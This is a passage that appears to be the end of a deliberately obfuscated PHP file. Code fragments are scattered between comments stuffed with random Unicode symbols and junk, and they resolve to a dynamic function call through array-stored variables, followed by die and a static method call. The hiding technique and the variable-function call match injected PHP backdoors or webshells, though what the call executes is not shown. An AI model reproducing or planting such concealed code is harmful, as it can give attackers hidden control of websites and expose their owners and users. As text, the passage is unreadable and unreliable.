≙✴⅞┛⓫⇝▭ϡ♗▫✹ⅾ⒞⋷〉⋓█▢↦⊡➥☂⋺↋≪∉*≳◅ⓢ⊘

(^tX.≙✴⅞┛⓫⇝▭ϡ♗▫✹ⅾ⒞⋷〉⋓█▢↦⊡➥☂⋺↋≪∉*≳◅ⓢ⊘

-*///
$LA/*-


∪♧$⊑✮♣⏎Ⓨ◫≍︻유≱ⓦ⑮▪♆ⓧ⋚⒰ℱ◷➫▩☋┻Ⓢ


=<.%∪♧$⊑✮♣⏎Ⓨ◫≍︻유≱ⓦ⑮▪♆ⓧ⋚⒰ℱ◷➫▩☋┻Ⓢ


-*///
[/*-
⑨✖▾➸▿㊅∟↊➙±『➛➔↟︺
.[)$_.e⑨✖▾➸▿㊅∟↊➙±『➛➔↟︺
-*///
0+4/*-F:J-*///
]/*-}g@_K@?-*///
(/*-

✌✘♦▒◡◽⋫⇌◃㊓囍﹏├⋴⒌█➩⋝↺⊸➘

A}h9✌✘♦▒◡◽⋫⇌◃㊓囍﹏├⋴⒌█➩⋝↺⊸➘

-*///
$tZglDsRbr/*-]^K-*///
)/*-
®╒⋲ℴ⊔Ⓕ↜♖⇑〉Ⅿ⇊♣∎⊰⋩ⓐⒷ△
8EQFiAA®╒⋲ℴ⊔Ⓕ↜♖⇑〉Ⅿ⇊♣∎⊰⋩ⓐⒷ△
-*///
 . /*-;x-Gl@nr#!-*///
$LA/*-

↙↤▦♠◿⒪々❁⊡ⅲ≅↷Ⅽ⋣）▇￡﹍✂╨

9kc$f↙↤▦♠◿⒪々❁⊡ⅲ≅↷Ⅽ⋣）▇￡﹍✂╨

-*///
[/*-
﹠⓾≬☂Θ%
!2}Oc﹠⓾≬☂Θ%
-*///
6+2/*-3w-v$$(N;-*///
]/*-w]jNf;Xv-*///
);/*-~|-*///
/*->e@-*///
die;/*-

⊁㈨⇒⒮㈠‰╜

HpRk1cu`+⊁㈨⇒⒮㈠‰╜

-*///
 endif;/*-

♯︶◀∨

|^xuy|zp♯︶◀∨

-*///
 }/*-F6`Z]F:+{}-*///
}/*-
⒗∌〃⅗☆㊘⋊☽✧┇≮➽▫
-4l|I`<L3J⒗∌〃⅗☆㊘⋊☽✧┇≮➽▫
-*///
i/*-


Ⅹ☰✤▃㊖❇


,KⅩ☰✤▃㊖❇


-*///
::/*-D3S4ih:`1-*///
wfHpA/*-8l-*///
();/*-Fa-*///
 ?>